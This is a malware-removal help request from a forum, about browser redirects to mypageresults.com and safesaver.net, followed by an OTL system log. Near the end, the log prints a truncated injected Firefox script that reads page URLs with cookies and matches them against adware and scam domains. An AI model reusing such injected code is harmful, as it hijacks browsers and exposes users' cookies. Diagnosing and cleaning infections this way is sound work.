
Browser redirects to mypageresults.com / safesaver.net [Solved]



#1
Kenjesse


Good Day All,

 

System is Acer Aspire M1610, 1.6 GHz, 3 GB Ram, Windows Vista SP2, 32bit using Open DNS.

 

Computer has been offline and in storage since September 2013.  Powered up yesterday, installed Trendnet AC1200 Dual Band Wireless USB Adapter, and once online installed 96-odd Windows Critical updates.  Went to Hulu to start a video to test things out when the redirect 1st occurred.  Hulu start page loaded, then after about 30 seconds or less the browser (Firefox) was redirected to URL mypageresults.com, title page "SafeSaver.net".  After some 30 seconds more the page blanks with the following error message (same happened using Chrome):

Request-URI Too Large

The requested URL's length exceeds the capacity limit for this server.

boot.gif?u=1&z=1400595119&s=PT1311FA&o=&


 
 

l.gif?hid=eb8d5c4e-dfa8-11e3-bd0d-02e774

1x1.gif

 

Have gotten random error messages from Open DNS regarding too many requests..? Not entirely sure what that is about.

 

I've run Malwarebytes, Superantispyware and Spybot... All found some things, which in itself is unusual as I rarely have any problems and Malwarebytes generally finds nothing when I do a monthly scan.  Did not make note of these results as I "assumed" the issue was going to be easily corrected.

 

OTL log is attached; any help will be much appreciated.

 

Ken

 

 

OTL logfile created on: 5/20/2014 9:56:17 AM - Run 3
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Ken\Desktop
Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.00 Gb Total Physical Memory | 1.80 Gb Available Physical Memory | 60.16% Memory free
6.20 Gb Paging File | 4.90 Gb Available in Paging File | 79.06% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 111.69 Gb Total Space | 50.78 Gb Free Space | 45.47% Space Free | Partition Type: NTFS
Drive D: | 111.43 Gb Total Space | 35.69 Gb Free Space | 32.03% Space Free | Partition Type: NTFS
Drive E: | 43.63 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
Drive F: | 74.53 Gb Total Space | 29.77 Gb Free Space | 39.95% Space Free | Partition Type: NTFS
 
Computer Name: KEN-HOME | User Name: Ken | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/05/20 08:28:38 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Ken\Desktop\OTL.exe
PRC - [2014/05/19 12:49:22 | 005,625,624 | ---- | M] (SUPERAntiSpyware) -- C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
PRC - [2014/05/07 21:52:34 | 032,668,056 | ---- | M] (Dropbox, Inc.) -- C:\Users\Ken\AppData\Roaming\Dropbox\bin\Dropbox.exe
PRC - [2014/03/11 10:13:24 | 000,279,776 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft Security Client\NisSrv.exe
PRC - [2014/03/11 10:13:24 | 000,022,216 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft Security Client\MsMpEng.exe
PRC - [2014/03/11 10:13:14 | 000,951,576 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Security Client\msseces.exe
PRC - [2013/04/25 19:32:22 | 000,602,112 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanCU.exe
PRC - [2013/04/23 03:48:17 | 010,244,448 | ---- | M] (TeamViewer GmbH) -- C:\Program Files\TeamViewer\Version8\TeamViewer.exe
PRC - [2013/04/23 03:48:17 | 003,574,624 | ---- | M] (TeamViewer GmbH) -- C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe
PRC - [2013/04/23 03:40:59 | 000,193,888 | ---- | M] (TeamViewer GmbH) -- C:\Program Files\TeamViewer\Version8\tv_w32.exe
PRC - [2013/02/12 22:37:16 | 001,263,952 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
PRC - [2013/01/30 11:41:30 | 000,430,080 | ---- | M] (Realtek) -- C:\Windows\SwUSB.exe
PRC - [2013/01/18 10:21:02 | 000,873,248 | ---- | M] (NVIDIA Corporation) -- C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
PRC - [2013/01/18 10:21:00 | 001,821,984 | ---- | M] (NVIDIA Corporation) -- C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
PRC - [2013/01/18 08:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) -- C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
PRC - [2012/12/14 15:54:26 | 000,036,864 | ---- | M] () -- C:\Windows\runSW.exe
PRC - [2012/10/23 18:58:52 | 000,120,728 | ---- | M] () -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
PRC - [2012/10/23 18:58:40 | 000,694,168 | ---- | M] () -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
PRC - [2012/09/08 10:18:45 | 000,116,608 | ---- | M] (SUPERAntiSpyware.com) -- C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
PRC - [2011/09/02 17:06:38 | 000,065,657 | ---- | M] (Motorola) -- C:\Program Files\Motorola\MotForwardDaemon\ForwardDaemon.exe
PRC - [2010/11/23 22:21:18 | 000,130,000 | R--- | M] (Symantec Corporation) -- C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\ccSvcHst.exe
PRC - [2010/06/16 17:42:58 | 000,839,680 | ---- | M] () -- C:\Program Files\OpenDNS Updater\OpenDNSUpdater.exe
PRC - [2010/03/18 19:17:48 | 000,019,456 | ---- | M] (Creative Technology Ltd) -- C:\Windows\System32\CtHelper.exe
PRC - [2010/02/12 10:23:12 | 000,286,720 | ---- | M] (Creative Technology Ltd) -- C:\Program Files\Creative\Shared Files\CTAudSvc.exe
PRC - [2009/04/11 02:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe
PRC - [2009/03/05 16:07:20 | 002,260,480 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
PRC - [2009/01/26 15:31:10 | 001,153,368 | ---- | M] (Safer Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
PRC - [2008/11/12 17:01:14 | 003,425,632 | ---- | M] (Symantec Corporation) -- C:\Program Files\Norton Ghost\Agent\VProSvc.exe
PRC - [2008/07/23 09:55:54 | 002,756,608 | ---- | M] (abelhadigital.com) -- C:\Program Files\HostsMan\hm.exe
PRC - [2008/06/26 19:09:36 | 000,167,936 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanWpsSvc.exe
PRC - [2008/01/29 17:38:31 | 000,583,048 | ---- | M] (Symantec Corporation) -- C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe
PRC - [2007/02/27 19:08:38 | 000,689,672 | ---- | M] (American Power Conversion Corporation) -- C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe
PRC - [2007/02/13 07:26:50 | 000,053,248 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/05/20 09:55:08 | 000,041,984 | ---- | M] () -- c:\Users\Ken\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpzovlxv.dll
MOD - [2014/01/02 23:42:50 | 003,610,624 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Dropbox\bin\wxmsw28uh_vc.dll
MOD - [2013/10/18 19:55:02 | 025,100,288 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Dropbox\bin\libcef.dll
MOD - [2013/09/05 00:14:10 | 004,300,456 | ---- | M] () -- C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
MOD - [2013/04/25 19:32:22 | 000,602,112 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanCU.exe
MOD - [2013/02/12 22:38:06 | 000,100,688 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdateCheck.dll
MOD - [2013/02/12 22:37:16 | 001,263,952 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
MOD - [2012/10/23 18:58:40 | 000,694,168 | ---- | M] () -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
MOD - [2011/12/13 11:10:00 | 000,413,696 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanDll.dll
MOD - [2010/10/20 16:45:26 | 008,801,120 | ---- | M] () -- C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
MOD - [2010/06/16 17:42:58 | 000,839,680 | ---- | M] () -- C:\Program Files\OpenDNS Updater\OpenDNSUpdater.exe
MOD - [2009/05/14 10:27:32 | 000,294,912 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WPSCtrl.dll
 
 
========== Services (SafeList) ==========
 
SRV - File not found [Auto | Running] -- C:\Program Files\Spybot -- (SBSDWSCService)
SRV - File not found [Auto | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe /h ccCommon -- (LiveUpdate Notice Ex)
SRV - File not found [Auto | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe /h ccCommon -- (CLTNetCnService)
SRV - [2014/03/11 10:13:24 | 000,279,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV - [2014/03/11 10:13:24 | 000,022,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV - [2013/12/19 00:41:02 | 030,814,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)
SRV - [2013/04/23 03:48:17 | 003,574,624 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe -- (TeamViewer8)
SRV - [2013/01/18 08:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe -- (Stereo Service)
SRV - [2012/12/14 15:54:26 | 000,036,864 | ---- | M] () [Auto | Running] -- C:\Windows\runSW.exe -- (RunSwUSB)
SRV - [2012/12/03 11:39:40 | 001,259,880 | ---- | M] (NVIDIA Corporation) [Auto | Stopped] -- C:\Program Files\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)
SRV - [2012/10/23 18:58:52 | 000,120,728 | ---- | M] () [Auto | Running] -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe -- (Motorola Device Manager)
SRV - [2012/09/08 10:18:45 | 000,116,608 | ---- | M] (SUPERAntiSpyware.com) [Auto | Running] -- C:\Program Files\SUPERAntiSpyware\SASCORE.EXE -- (!SASCORE)
SRV - [2011/09/02 17:06:38 | 000,065,657 | ---- | M] (Motorola) [Auto | Running] -- C:\Program Files\Motorola\MotForwardDaemon\ForwardDaemon.exe -- (PST Service)
SRV - [2011/04/12 17:24:09 | 000,079,360 | ---- | M] (Creative Labs) [On_Demand | Stopped] -- C:\Program Files\Common Files\Creative Labs Shared\Service\AL6Licensing.exe -- (Creative ALchemy AL6 Licensing Service)
SRV - [2011/04/12 17:11:04 | 000,079,360 | ---- | M] (Creative Labs) [On_Demand | Stopped] -- C:\Program Files\Common Files\Creative Labs Shared\Service\CTAELicensing.exe -- (Creative Audio Engine Licensing Service)
SRV - [2010/11/23 22:21:18 | 000,130,000 | R--- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\ccSvcHst.exe -- (NSL)
SRV - [2010/02/12 10:23:12 | 000,286,720 | ---- | M] (Creative Technology Ltd) [Auto | Running] -- C:\Program Files\Creative\Shared Files\CTAudSvc.exe -- (CTAudSvcService)
SRV - [2009/08/18 00:19:24 | 000,093,848 | ---- | M] (SiSoftware) [On_Demand | Stopped] -- C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2011\RpcAgentSrv.exe -- (SandraAgentSrv)
SRV - [2009/02/19 16:10:54 | 000,238,968 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Symantec\LiveUpdate\AluSchedulerSvc.exe -- (Automatic LiveUpdate Scheduler)
SRV - [2009/02/19 16:09:53 | 003,220,856 | ---- | M] (Symantec Corporation) [On_Demand | Stopped] -- C:\Program Files\Symantec\LiveUpdate\LuComServer_3_4.EXE -- (LiveUpdate)
SRV - [2008/11/12 17:01:14 | 003,425,632 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Norton Ghost\Agent\VProSvc.exe -- (Norton Ghost)
SRV - [2008/06/26 19:09:36 | 000,167,936 | ---- | M] () [Auto | Running] -- C:\Program Files\TRENDnet\TEW-805UB\WlanWpsSvc.exe -- (WlanWpsSvc)
SRV - [2008/01/29 17:38:31 | 000,583,048 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe -- (LiveUpdate Notice Service)
SRV - [2008/01/19 03:38:24 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2007/02/27 19:08:38 | 000,689,672 | ---- | M] (American Power Conversion Corporation) [Auto | Running] -- C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe -- (APC UPS Service)
SRV - [2007/02/22 20:53:16 | 002,217,416 | ---- | M] () [Auto | Stopped] -- C:\Program Files\Common Files\Acronis\Acronis Disk Director\oss_reinstall_svc.exe -- (AcronisOSSReinstallSvc)
SRV - [2007/02/13 07:26:50 | 000,053,248 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe -- (eRecoveryService)
 
 
========== Driver Services (SafeList) ==========
 
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\SymIM.sys -- (SymIMMP)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkfwd.sys -- (NwlnkFwd)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkflt.sys -- (NwlnkFlt)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\Motousbnet.sys -- (Motousbnet)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motswch.sys -- (MotoSwitchService)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motmodem.sys -- (motmodem)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motodrv.sys -- (MotDev)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motccgpfl.sys -- (motccgpfl)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motccgp.sys -- (motccgp)
DRV - File not found [Kernel | On_Demand | Stopped] -- System32\Drivers\motoandroid.sys -- (motandroidusb)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ipinip.sys -- (IpInIp)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motfilt.sys -- (BTCFilterService)
DRV - File not found [Kernel | Disabled | Stopped] -- C:\Windows\system32\drivers\blbdrive.sys -- (blbdrive)
DRV - [2014/03/11 09:52:30 | 000,104,264 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\NisDrvWFP.sys -- (NisDrv)
DRV - [2013/02/26 00:22:06 | 008,939,296 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\nvlddmkm.sys -- (nvlddmkm)
DRV - [2013/02/09 07:23:00 | 001,957,448 | ---- | M] (Realtek Semiconductor Corporation                           ) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\RTWlanU.sys -- (RtlWlanu)
DRV - [2011/08/21 13:10:33 | 000,232,512 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\Windows\System32\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV - [2011/08/02 09:59:41 | 000,105,592 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys -- (EraserUtilRebootDrv)
DRV - [2011/07/22 12:27:02 | 000,012,880 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\sasdifsv.sys -- (SASDIFSV)
DRV - [2011/07/12 17:55:22 | 000,067,664 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS -- (SASKUTIL)
DRV - [2011/05/12 09:44:04 | 000,374,392 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys -- (eeCtrl)
DRV - [2010/09/02 17:49:08 | 000,013,312 | ---- | M] (June Fabrics Technology Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\pneteth.sys -- (pneteth)
DRV - [2010/03/18 20:50:12 | 000,189,528 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\haP17v2k.sys -- (hap17v2k)
DRV - [2010/03/18 20:50:04 | 000,162,904 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\haP16v2k.sys -- (hap16v2k)
DRV - [2010/03/18 20:49:56 | 000,798,808 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ha10kx2k.sys -- (ha10kx2k)
DRV - [2010/03/18 20:45:42 | 000,092,760 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\emupia2k.sys -- (emupia)
DRV - [2010/03/18 20:45:28 | 000,157,272 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctsfm2k.sys -- (ctsfm2k)
DRV - [2010/03/18 20:45:20 | 000,014,424 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctprxy2k.sys -- (ctprxy2k)
DRV - [2010/03/18 20:45:12 | 000,127,576 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctoss2k.sys -- (ossrv)
DRV - [2010/03/18 20:40:48 | 000,347,144 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ctdvda2k.sys -- (ctdvda2k)
DRV - [2010/03/18 20:40:40 | 000,528,472 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctaud2k.sys -- (ctaud2k)
DRV - [2010/03/18 20:40:32 | 000,511,064 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctac32k.sys -- (ctac32k)
DRV - [2010/03/18 20:39:36 | 000,100,952 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTERFXFX.sys -- (CTERFXFX.SYS)
DRV - [2010/03/18 20:39:36 | 000,100,952 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTERFXFX.sys -- (CTERFXFX)
DRV - [2010/03/18 20:39:28 | 000,566,360 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CTSBLFX.sys -- (CTSBLFX.SYS)
DRV - [2010/03/18 20:39:28 | 000,566,360 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTSBLFX.sys -- (CTSBLFX)
DRV - [2010/03/18 20:39:18 | 000,555,096 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CTAUDFX.sys -- (CTAUDFX.SYS)
DRV - [2010/03/18 20:39:18 | 000,555,096 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTAUDFX.sys -- (CTAUDFX)
DRV - [2010/03/18 20:39:10 | 000,099,416 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\COMMONFX.sys -- (COMMONFX.SYS)
DRV - [2010/03/18 20:39:10 | 000,099,416 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\COMMONFX.sys -- (COMMONFX)
DRV - [2009/11/20 15:49:30 | 000,465,408 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\SISGRKMD.sys -- (SiS6350)
DRV - [2009/11/13 12:40:41 | 000,058,416 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\SISAGPX.SYS -- (SISAGP)
DRV - [2009/08/08 00:46:56 | 000,023,112 | ---- | M] (SiSoftware) [Kernel | On_Demand | Stopped] -- C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2011\WNt500x86\sandra.sys -- (SANDRA)
DRV - [2009/04/11 00:42:52 | 000,031,616 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUSB)
DRV - [2009/02/04 01:21:11 | 000,005,632 | ---- | M] () [File_System | System | Running] -- C:\Windows\System32\drivers\StarOpen.sys -- (StarOpen)
DRV - [2009/01/08 10:42:54 | 000,036,608 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\System32\FsUsbExDisk.Sys -- (FsUsbExDisk)
DRV - [2008/11/12 16:49:22 | 000,138,080 | ---- | M] (StorageCraft) [File_System | Boot | Running] -- C:\Windows\System32\drivers\symsnap.sys -- (symsnap)
DRV - [2008/02/22 16:33:02 | 000,114,304 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdmdm.sys -- (sscdmdm)
DRV - [2008/02/22 16:33:02 | 000,094,336 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdserd.sys -- (sscdserd)
DRV - [2008/02/22 16:33:02 | 000,014,976 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdmdfl.sys -- (sscdmdfl)
DRV - [2008/02/22 16:33:00 | 000,087,936 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdbus.sys -- (sscdbus)
DRV - [2008/01/04 16:06:37 | 000,114,048 | ---- | M] (Acronis) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\snapman.sys -- (snapman)
DRV - [2007/07/31 17:22:16 | 000,014,072 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vproeventmonitor.sys -- (VProEventMonitor)
DRV - [2007/07/09 06:48:44 | 000,020,622 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\bcmndis.sys -- (USB_NDIS_51)
DRV - [2007/04/23 10:50:50 | 000,025,896 | ---- | M] (Windows ® Codename Longhorn DDK provider) [Kernel | System | Running] -- C:\Windows\System32\drivers\RtlProt.sys -- (RtlProt)
DRV - [2007/03/28 21:49:42 | 000,128,104 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\WimFltr.sys -- (WimFltr)
DRV - [2007/03/28 21:29:10 | 000,037,864 | ---- | M] (Symantec Corporation) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\v2imount.sys -- (v2imount)
DRV - [2007/02/06 14:27:04 | 000,185,728 | ---- | M] (Hauppauge Computer Works, Inc.) [23|25|26]xxx) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\hcwPP2.sys -- (hcwPP2)
DRV - [2007/01/22 04:09:08 | 000,046,592 | ---- | M] (Silicon Integrated Systems Corp.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\SiSGB6.sys -- (SiSGbeLH)
DRV - [2007/01/09 09:22:28 | 000,006,144 | ---- | M] (Chic) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\moufiltr.sys -- (moufiltr)
DRV - [2006/12/07 19:12:02 | 000,076,584 | ---- | M] () [Kernel | Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\int15.sys -- (int15)
DRV - [2006/09/19 17:47:04 | 000,080,744 | ---- | M] (Wasay) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\WSVD.sys -- (WSVD)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://en.us.acer.yahoo.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://en.us.acer.yahoo.com
IE - HKLM\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://g.msn.com/0SE...S01?FORM=TOOLBR
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SEARCH PAGE = http://g.msn.com/0SE...S01?FORM=TOOLBR
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultName = Yahoo! Search
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultURL = http://search.yahoo....=utf-8&fr=b1ie7
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1
IE - HKCU\..\URLSearchHook: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - No CLSID value found
IE - HKCU\..\SearchScopes,DefaultScope = {DC3C0BC4-487D-413F-8EF7-81BA5B62BAA5}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.c...rce?}&mkt=en-us
IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
IE - HKCU\..\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}: "URL" = http://www.ask.com/w...n=&geo=US&ver=1
IE - HKCU\..\SearchScopes\{DC3C0BC4-487D-413F-8EF7-81BA5B62BAA5}: "URL" = http://www.google.co...1I7GGIH_enUS252
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "Google"
FF - prefs.js..browser.search.defaulturl: "http://www.google.co...-8&oe=UTF-8&q="
FF - prefs.js..browser.search.selectedEngine: "Google"
FF - prefs.js..browser.search.update: false
FF - prefs.js..browser.startup.homepage: "https://www.google.com/"
FF - prefs.js..extensions.510db82b7af87.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A